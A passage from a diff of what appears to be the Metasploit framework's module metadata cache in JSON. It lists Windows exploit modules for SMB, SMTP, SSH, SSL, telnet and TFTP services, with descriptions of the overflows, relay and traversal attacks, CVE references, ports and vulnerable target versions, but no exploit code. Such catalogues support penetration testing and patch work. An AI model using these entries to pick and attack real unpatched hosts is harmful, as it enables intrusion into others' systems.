"URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/4305d67f-9273-49fe-a067-909b6ae8a341", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/3ca0723e-36ea-448a-a97e-1906dd3d07a6", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/dda988f0-4cce-4ffe-b8c9-d5199deafba5", + "URL-https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrasm/169e435d-a975-4c1c-bf41-55fd2bd76125" + ], + "platform": "Windows", + "arch": "x86", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "Windows Server 2003 SP0 (English)", + "Windows Server 2003 SP1 (English) (NX)", + "Windows Server 2003 SP2 (English) (NX)", + "Windows Server 2003 R2 SP2 (English) (NX)" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/smb/smb_rras_erraticgopher.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_rras_erraticgopher", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ErraticGopher" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "unreliable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/smb_shadow": { + "name": "Microsoft Windows SMB Direct Session Takeover", + "fullname": "exploit/windows/smb/smb_shadow", + "aliases": [], + "rank": 0, + "disclosure_date": "2021-02-16", + "type": "exploit", + "author": [ + "usiegl00" + ], + "description": "This module will intercept direct SMB authentication requests to\n another host, gaining access to an authenticated SMB session if\n successful. If the connecting user is an administrator and network\n logins are allowed to the target machine, this module will execute an\n arbitrary payload. 
To exploit this, the target system must try to\n autheticate to another host on the local area network.\n\n SMB Direct Session takeover is a combination of previous attacks.\n\n This module is dependent on an external ARP spoofer. The builtin ARP\n spoofer was not providing sufficient host discovery. Bettercap v1.6.2\n was used during the development of this module.\n\n The original SMB relay attack was first reported by Sir Dystic on March\n 31st, 2001 at @lanta.con in Atlanta, Georgia.", + "references": [ + "URL-https://strontium.io/blog/introducing-windows-10-smb-shadow-attack" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2022-04-06 07:12:46 +0000", + "path": "/modules/exploits/windows/smb/smb_shadow.rb", + "is_install_path": true, + "ref_name": "windows/smb/smb_shadow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/timbuktu_plughntcommand_bof": { + "name": "Timbuktu PlughNTCommand Named Pipe Buffer Overflow", + "fullname": "exploit/windows/smb/timbuktu_plughntcommand_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-06-25", + "type": "exploit", + "author": [ + "bannedit " + ], + "description": "This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6\n in a pretty novel way.\n\n This exploit requires two connections. The first connection is used to leak stack data\n using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying\n a large value for this argument it is possible to cause Timbuktu to reply to the initial\n request with leaked stack data. 
Using this data allows for reliable exploitation of the\n buffer overflow vulnerability.\n\n Props to Infamous41d for helping in finding this exploitation path.\n\n The second connection utilizes the data from the data leak to accurately exploit\n the stack based buffer overflow vulnerability.\n\n TODO:\n hdm suggested using meterpreter's migration capability and restarting the process\n for multishot exploitation.", + "references": [ + "CVE-2009-1394", + "OSVDB-55436", + "BID-35496", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809" + ], + "platform": "Windows", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic Targeting" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb", + "is_install_path": true, + "ref_name": "windows/smb/timbuktu_plughntcommand_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smb/webexec": { + "name": "WebExec Authenticated User Code Execution", + "fullname": "exploit/windows/smb/webexec", + "aliases": [], + "rank": 0, + "disclosure_date": "2018-10-24", + "type": "exploit", + "author": [ + "Ron " + ], + "description": "This module uses a valid username and password of any level (or\n password hash) to execute an arbitrary payload. 
This module is similar\n to the \"psexec\" module, except allows any non-guest account by default.", + "references": [ + "URL-https://webexec.org", + "CVE-2018-15442" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Automatic", + "Native upload" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smb/webexec.rb", + "is_install_path": true, + "ref_name": "windows/smb/webexec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/mailcarrier_smtp_ehlo": { + "name": "TABS MailCarrier v2.51 SMTP EHLO Overflow", + "fullname": "exploit/windows/smtp/mailcarrier_smtp_ehlo", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-10-26", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits the MailCarrier v2.51 suite SMTP service.\n The stack is overwritten when sending an overly long EHLO command.", + "references": [ + "CVE-2004-1638", + "OSVDB-11174", + "BID-11535", + "EDB-598" + ], + "platform": "Windows", + "arch": "x86", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP0 - XP SP1 - EN/FR/GR", + "Windows XP SP2 - EN" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb", + "is_install_path": true, + "ref_name": "windows/smtp/mailcarrier_smtp_ehlo", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/mercury_cram_md5": { + "name": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow", + "fullname": "exploit/windows/smtp/mercury_cram_md5", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-08-18", + "type": "exploit", + 
"author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\n By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\n may be able to execute arbitrary code.", + "references": [ + "CVE-2007-4440", + "OSVDB-39669", + "BID-25357" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Mercury Mail Transport System 4.51" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/mercury_cram_md5.rb", + "is_install_path": true, + "ref_name": "windows/smtp/mercury_cram_md5", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/ms03_046_exchange2000_xexch50": { + "name": "MS03-046 Exchange 2000 XEXCH50 Heap Overflow", + "fullname": "exploit/windows/smtp/ms03_046_exchange2000_xexch50", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-10-15", + "type": "exploit", + "author": [ + "hdm ", + "aushack " + ], + "description": "This is an exploit for the Exchange 2000 heap overflow. Due\n to the nature of the vulnerability, this exploit is not very\n reliable. This module has been tested against Exchange 2000\n SP0 and SP3 running a Windows 2000 system patched to SP4. It\n normally takes between one and 100 connection attempts to\n successfully obtain a shell. 
This exploit is *very* unreliable.", + "references": [ + "CVE-2003-0714", + "BID-8838", + "OSVDB-2674", + "MSB-MS03-046", + "EDB-113" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Exchange 2000" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb", + "is_install_path": true, + "ref_name": "windows/smtp/ms03_046_exchange2000_xexch50", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/njstar_smtp_bof": { + "name": "NJStar Communicator 3.00 MiniSMTP Buffer Overflow", + "fullname": "exploit/windows/smtp/njstar_smtp_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-10-31", + "type": "exploit", + "author": [ + "Dillon Beresford" + ], + "description": "This module exploits a stack buffer overflow vulnerability in NJStar Communicator\n Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple\n NJStar products, and will continue to run in the background even if the\n software is already shutdown. 
According to the vendor's testimonials,\n NJStar software is also used by well known companies such as Siemens, NEC,\n Google, Yahoo, eBay; government agencies such as the FBI, Department of\n Justice (HK); as well as a long list of universities such as Yale, Harvard,\n University of Tokyo, etc.", + "references": [ + "OSVDB-76728", + "CVE-2011-4040", + "URL-http://www.njstar.com/cms/njstar-communicator", + "EDB-18057" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/SP3", + "Windows Server 2003 SP0", + "Windows Server 2003 SP1/SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/njstar_smtp_bof.rb", + "is_install_path": true, + "ref_name": "windows/smtp/njstar_smtp_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/sysgauge_client_bof": { + "name": "SysGauge SMTP Validation Buffer Overflow", + "fullname": "exploit/windows/smtp/sysgauge_client_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-02-28", + "type": "exploit", + "author": [ + "Chris Higgins", + "Peter Baris" + ], + "description": "This module will setup an SMTP server expecting a connection from SysGauge 1.5.18\n via its SMTP server validation. 
The module sends a malicious response along in the\n 220 service ready response and exploits the client, resulting in an unprivileged shell.", + "references": [ + "CVE-2017-6416", + "EDB-41479" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2018-07-12 17:34:52 +0000", + "path": "/modules/exploits/windows/smtp/sysgauge_client_bof.rb", + "is_install_path": true, + "ref_name": "windows/smtp/sysgauge_client_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/wmailserver": { + "name": "SoftiaCom WMailserver 1.0 Buffer Overflow", + "fullname": "exploit/windows/smtp/wmailserver", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-07-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n (SMTP) via a SEH frame overwrite.", + "references": [ + "CVE-2005-2287", + "OSVDB-17883", + "BID-14213" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English All", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/wmailserver.rb", + "is_install_path": true, + "ref_name": "windows/smtp/wmailserver", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/smtp/ypops_overflow1": { + "name": "YPOPS 0.6 Buffer Overflow", + "fullname": "exploit/windows/smtp/ypops_overflow1", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-09-27", + "type": "exploit", + "author": [ + "acaro " + ], + "description": "This module exploits a stack buffer overflow in the YPOPS POP3\n 
service.\n\n This is a classic stack buffer overflow for YPOPS version 0.6.\n Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\n jmp ebx opcode in ws_32.dll", + "references": [ + "CVE-2004-1558", + "OSVDB-10367", + "BID-11256", + "URL-http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Automatic", + "Windows 2000 SP0 Italian", + "Windows 2000 Advanced Server Italian SP4", + "Windows 2000 Advanced Server SP3 English", + "Windows 2000 SP0 English", + "Windows 2000 SP1 English", + "Windows 2000 SP2 English", + "Windows 2000 SP3 English", + "Windows 2000 SP4 English", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English", + "Windows 2003 SP0 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/smtp/ypops_overflow1.rb", + "is_install_path": true, + "ref_name": "windows/smtp/ypops_overflow1", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/freeftpd_key_exchange": { + "name": "FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow", + "fullname": "exploit/windows/ssh/freeftpd_key_exchange", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-05-12", + "type": "exploit", + "author": [ + "riaf " + ], + "description": "This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.\n This module is based on MC's freesshd_key_exchange exploit.", + "references": [ + "CVE-2006-2407", + "OSVDB-25569", + "BID-17958" + ], + "platform": "Windows", + "arch": "", + "rport": 22, + "autofilter_ports": [], + 
"autofilter_services": [], + "targets": [ + "Windows 2000 SP0-SP4 English", + "Windows 2000 SP0-SP4 German", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssh/freeftpd_key_exchange.rb", + "is_install_path": true, + "ref_name": "windows/ssh/freeftpd_key_exchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/freesshd_authbypass": { + "name": "Freesshd Authentication Bypass", + "fullname": "exploit/windows/ssh/freesshd_authbypass", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-08-11", + "type": "exploit", + "author": [ + "Aris", + "kcope", + "Daniele Martini ", + "Imran E. Dawoodjee (minor improvements)>" + ], + "description": "This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass\n authentication. You just need the username (which defaults to root). 
The exploit\n has been tested with both password and public key authentication.", + "references": [ + "CVE-2012-6066", + "OSVDB-88006", + "BID-56785", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html", + "URL-https://seclists.org/fulldisclosure/2010/Aug/132" + ], + "platform": "Windows", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "PowerShell", + "CmdStager upload" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/ssh/freesshd_authbypass.rb", + "is_install_path": true, + "ref_name": "windows/ssh/freesshd_authbypass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/freesshd_key_exchange": { + "name": "FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow", + "fullname": "exploit/windows/ssh/freesshd_key_exchange", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-05-12", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.", + "references": [ + "CVE-2006-2407", + "OSVDB-25463", + "BID-17958" + ], + "platform": "Windows", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssh/freesshd_key_exchange.rb", + "is_install_path": true, + "ref_name": "windows/ssh/freesshd_key_exchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/putty_msg_debug": { + "name": 
"PuTTY Buffer Overflow", + "fullname": "exploit/windows/ssh/putty_msg_debug", + "aliases": [], + "rank": 300, + "disclosure_date": "2002-12-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the PuTTY SSH client that is\n triggered through a validation error in SSH.c. This vulnerability\n affects versions 0.53 and earlier.", + "references": [ + "CVE-2002-1359", + "OSVDB-8044", + "URL-http://www.rapid7.com/advisories/R7-0009.html", + "BID-6407" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English", + "Windows XP SP2 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssh/putty_msg_debug.rb", + "is_install_path": true, + "ref_name": "windows/ssh/putty_msg_debug", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/securecrt_ssh1": { + "name": "SecureCRT SSH1 Buffer Overflow", + "fullname": "exploit/windows/ssh/securecrt_ssh1", + "aliases": [], + "rank": 200, + "disclosure_date": "2002-07-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in SecureCRT <= 4.0\n Beta 2. 
By sending a vulnerable client an overly long\n SSH1 protocol identifier string, it is possible to execute\n arbitrary code.\n\n This module has only been tested on SecureCRT 3.4.4.", + "references": [ + "CVE-2002-1059", + "OSVDB-4991", + "BID-5287" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SecureCRT.exe (3.4.4)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssh/securecrt_ssh1.rb", + "is_install_path": true, + "ref_name": "windows/ssh/securecrt_ssh1", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssh/sysax_ssh_username": { + "name": "Sysax 5.53 SSH Username Buffer Overflow", + "fullname": "exploit/windows/ssh/sysax_ssh_username", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-27", + "type": "exploit", + "author": [ + "Craig Freyman", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Sysax's SSH service. By\n supplying a long username, the SSH server will copy that data on the stack\n without proper bounds checking, therefore allowing remote code execution\n under the context of the user. 
Please note that previous versions\n (before 5.53) are also affected by this bug.", + "references": [ + "OSVDB-79689", + "URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html", + "EDB-18535" + ], + "platform": "Windows", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Sysax 5.53 on Win XP SP3 / Win2k3 SP0", + "Sysax 5.53 on Win2K3 SP1/SP2" + ], + "mod_time": "2022-04-18 09:36:52 +0000", + "path": "/modules/exploits/windows/ssh/sysax_ssh_username.rb", + "is_install_path": true, + "ref_name": "windows/ssh/sysax_ssh_username", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ssl/ms04_011_pct": { + "name": "MS04-011 Microsoft Private Communications Transport Overflow", + "fullname": "exploit/windows/ssl/ms04_011_pct", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-04-13", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a buffer overflow in the Microsoft\n Windows SSL PCT protocol stack. This code is based on Johnny\n Cyberpunk's THC release and has been tested against Windows\n 2000 and Windows XP. To use this module, specify the remote\n port of any SSL service, or the port and protocol of an\n application that uses SSL. The only application protocol\n supported at this time is SMTP. You only have one chance to\n select the correct target, if you are attacking IIS, you may\n want to try one of the other exploits first (WebDAV). If\n WebDAV does not work, this more than likely means that this\n is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS\n 5.1). 
Using the wrong target may not result in an immediate\n crash of the remote system.", + "references": [ + "CVE-2003-0719", + "OSVDB-5250", + "BID-10116", + "MSB-MS04-011" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4", + "Windows 2000 SP3", + "Windows 2000 SP2", + "Windows 2000 SP1", + "Windows 2000 SP0", + "Windows XP SP0", + "Windows XP SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ssl/ms04_011_pct.rb", + "is_install_path": true, + "ref_name": "windows/ssl/ms04_011_pct", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/telnet/gamsoft_telsrv_username": { + "name": "GAMSoft TelSrv 1.5 Username Buffer Overflow", + "fullname": "exploit/windows/telnet/gamsoft_telsrv_username", + "aliases": [], + "rank": 200, + "disclosure_date": "2000-07-17", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.\n Other versions may also be affected. 
The service terminates after exploitation,\n so you only get one chance!", + "references": [ + "CVE-2000-0665", + "OSVDB-373", + "BID-1478", + "URL-http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip" + ], + "platform": "Windows", + "arch": "x86", + "rport": 23, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP0/4 English REMOTE", + "Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)", + "Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb", + "is_install_path": true, + "ref_name": "windows/telnet/gamsoft_telsrv_username", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/telnet/goodtech_telnet": { + "name": "GoodTech Telnet Server Buffer Overflow", + "fullname": "exploit/windows/telnet/goodtech_telnet", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-03-15", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n versions prior to 5.0.7. 
By sending an overly long string, an attacker can\n overwrite the buffer and control program execution.", + "references": [ + "CVE-2005-0768", + "OSVDB-14806", + "BID-12815" + ], + "platform": "Windows", + "arch": "", + "rport": 2380, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English All", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/telnet/goodtech_telnet.rb", + "is_install_path": true, + "ref_name": "windows/telnet/goodtech_telnet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/attftp_long_filename": { + "name": "Allied Telesyn TFTP Server 1.9 Long Filename Overflow", + "fullname": "exploit/windows/tftp/attftp_long_filename", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-11-27", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a\n request (get/write) for an overly long file name.", + "references": [ + "CVE-2006-6184", + "OSVDB-11350", + "BID-21320", + "EDB-2887" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows NT SP4 English", + "Windows 2000 SP0 English", + "Windows 2000 SP1 English", + "Windows 2000 SP2 English", + "Windows 2000 SP3 English", + "Windows 2000 SP4 English", + "Windows XP SP0/1 English", + "Windows XP SP2 English", + "Windows XP SP3 English", + "Windows Server 2003", + "Windows Server 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/attftp_long_filename.rb", + "is_install_path": true, + "ref_name": "windows/tftp/attftp_long_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": null + }, + "exploit_windows/tftp/distinct_tftp_traversal": { + "name": "Distinct TFTP 3.10 Writable Directory Traversal Execution", + "fullname": "exploit/windows/tftp/distinct_tftp_traversal", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-04-08", + "type": "exploit", + "author": [ + "modpr0be", + "sinn3r " + ], + "description": "This module exploits a directory traversal vulnerability in the TFTP\n Server component of Distinct Intranet Servers version 3.10 which\n allows a remote attacker to write arbitrary files to the server file\n system, resulting in code execution under the context of 'SYSTEM'.\n This module has been tested successfully on TFTP Server version 3.10\n on Windows XP SP3 (EN).", + "references": [ + "OSVDB-80984", + "EDB-18718", + "URL-http://www.spentera.com/advisories/2012/SPN-01-2012.pdf", + "CVE-2012-6664" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-01-28 10:35:25 +0000", + "path": "/modules/exploits/windows/tftp/distinct_tftp_traversal.rb", + "is_install_path": true, + "ref_name": "windows/tftp/distinct_tftp_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/tftp/dlink_long_filename": { + "name": "D-Link TFTP 1.0 Long Filename Buffer Overflow", + "fullname": "exploit/windows/tftp/dlink_long_filename", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-03-12", + "type": "exploit", + "author": [ + "LSO ", + "aushack " + ], + "description": "This module exploits a stack buffer overflow in D-Link TFTP 1.0.\n By sending a request for an overly long file name, an attacker\n could overflow a buffer and execute arbitrary code. 
For best results,\n use bind payloads with nonx (No NX).", + "references": [ + "CVE-2007-1435", + "OSVDB-33977", + "BID-22923" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English", + "Windows 2000 SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/dlink_long_filename.rb", + "is_install_path": true, + "ref_name": "windows/tftp/dlink_long_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/futuresoft_transfermode": { + "name": "FutureSoft TFTP Server 2000 Transfer-Mode Overflow", + "fullname": "exploit/windows/tftp/futuresoft_transfermode", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-05-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the FutureSoft TFTP Server\n 2000 product. By sending an overly long transfer-mode string, we were able\n to overwrite both the SEH and the saved EIP. A subsequent write-exception\n that will occur allows the transferring of execution to our shellcode\n via the overwritten SEH. 
This module has been tested against Windows\n 2000 Professional and for some reason does not seem to work against\n Windows 2000 Server (could not trigger the overflow at all).", + "references": [ + "CVE-2005-1812", + "OSVDB-16954", + "BID-13821" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 Pro English ALL", + "Windows XP Pro SP0/SP1 English", + "Windows NT SP5/SP6a English", + "Windows 2003 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/futuresoft_transfermode.rb", + "is_install_path": true, + "ref_name": "windows/tftp/futuresoft_transfermode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/netdecision_tftp_traversal": { + "name": "NetDecision 4.2 TFTP Writable Directory Traversal Execution", + "fullname": "exploit/windows/tftp/netdecision_tftp_traversal", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-05-16", + "type": "exploit", + "author": [ + "Rob Kraus", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in NetDecision 4.2 TFTP server. 
The\n software contains a directory traversal vulnerability that allows a remote attacker\n to write arbitrary file to the file system, which results in code execution under\n the context of user executing the TFTP Server.", + "references": [ + "CVE-2009-1730", + "OSVDB-54607", + "BID-35002" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2" + ], + "mod_time": "2021-01-28 10:35:25 +0000", + "path": "/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb", + "is_install_path": true, + "ref_name": "windows/tftp/netdecision_tftp_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/opentftp_error_code": { + "name": "OpenTFTP SP 1.4 Error Packet Overflow", + "fullname": "exploit/windows/tftp/opentftp_error_code", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-07-05", + "type": "exploit", + "author": [ + "tixxDZ", + "steponequit" + ], + "description": "This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable\n condition triggers when the TFTP opcode is configured as an error packet, the TFTP\n service will then 